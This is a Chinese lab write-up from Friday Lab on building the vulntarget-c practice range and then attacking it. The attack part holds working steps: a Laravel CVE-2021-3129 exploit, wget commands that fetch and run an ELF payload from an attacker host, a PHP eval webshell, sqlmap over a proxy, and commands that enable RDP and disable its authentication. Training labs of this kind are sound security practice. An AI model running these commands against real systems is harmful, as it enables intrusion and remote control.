星期五实验室
vulntarget开源靶场交流群:
vuntarget免责声明
相关漏洞技术
下载地址
百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p
其中vulntarget-c是本次环境
github地址:
https://github.com/crow821/vulntarget
测试说明
-
镜像都是基于VM16做的,没有向下兼容 -
操作人员自行修改第一层外网IP,将其修改为攻击机可访问IP即可,三层均为服务自启 -
下载靶机,开机之后,确认自己网络配置好了,可以选择本地做一个快照,原本的快照可能会因为制作靶机的处理器和当前打开靶机的处理器不一致,导致快照恢复失败,或者异常(见谅) -
内含flag,各位师傅自行发现
拓扑图
搭建过程
2.1 外网ubuntu 20
php版本为:7.4.3
先更新:apt-get update,再安装php:apt install php7.4-cli
安装composer
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
php composer-setup.php --version=2.0.8 //安装特定版本,默认安装最新的,后面composer安装插件的时候就会报错,本次选用2.0.8,其他版本未测试
php -r "unlink('composer-setup.php');" //删除文件
mv composer.phar /usr/bin/composer
cp .env.example .env # .env文件必须这里设置了 APP_DEBUG=true,默认就行
php artisan key:generate # 生成密钥
清理缓存:php artisan config:clear,然后再执行:php artisan config:cache,再重新生成key:php artisan key:generate
开启web服务试试:php artisan serve --host=0.0.0.0还是不行,再次执行:php artisan config:cache
安装apache
后经测试发现,使用php启动环境,msf连接之后web页面就会卡住(不影响msf的操作,单纯的web连接不上,估计是php启动服务是单线程的,msf连接之后,占用了),改为apache来起web服务
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>
# This is the network config written by 'subiquity'
network:
ethernets:
ens33:
addresses:
- 192.168.0.104/24 //修改
gateway4: 192.168.0.1 //修改
nameservers:
addresses:
- 8.8.8.8
search:
- local
ens38:
addresses:
- 10.0.20.141/24
gateway4: 10.0.20.1
version: 2
保存,然后重启服务:sudo netplan apply
2.2 server2016
ubuntu16
测试过程
Laravel getshell
git clone https://github.com/SNCKER/CVE-2021-3129
cd CVE-2021-3129
git clone https://github.com/ambionics/phpggc.git(exp执行需要使用此工具)
wget http://10.30.7.99:9999/7776.elf&&chmod 777 7776.elf&&./7776.elf
cd /var/www/html/public&&wget http://10.30.7.99:9999/7776.elf&&chmod 777 7776.elf&&./7776.elf
sudo提权
run post/multi/recon/local_exploit_suggester
POST /classes/Login.php?f=login HTTP/1.1
Host: 10.0.20.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 30
Origin: http://10.0.20.100
Connection: close
Referer: http://10.0.20.100/admin/login.php
Cookie: PHPSESSID=ndd4l701jdk2un19ijjhufgc39
username=admin&password=123456
账号:admin
密码:admin123
GET /admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: 10.0.20.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.0.20.100/admin/?page=inquiries
Cookie: PHPSESSID=ndd4l701jdk2un19ijjhufgc39
python3 -c 'import pty;pty.spawn("/bin/bash")'
运行frpc客户端
sqlmap -r 2.txt --proxy=socks://10.30.7.99:8888
echo ^<^?php $a = $_REQUEST['d'];$a = "$a";$b['test'] = "";eval($b['test']."$a");?^>^ > test.php
use auxiliary/scanner/portscan/tcp
reg add "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
sudo版本为1.8.16存在sudo提权漏洞 ,但是没有利用成功
#exp
https://github.com/briskets/CVE-2021-3493
FRIDAY LAB
星期五实验室成立于2017年,汇集众多技术研究人员,在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成,且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队,星期五实验室凭借精湛的专业技术水平,为产品研发提供新思路、为行业技术革新探索新方向。
扫二维码|关注我们
星期五实验室
FRIDAY LAB
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论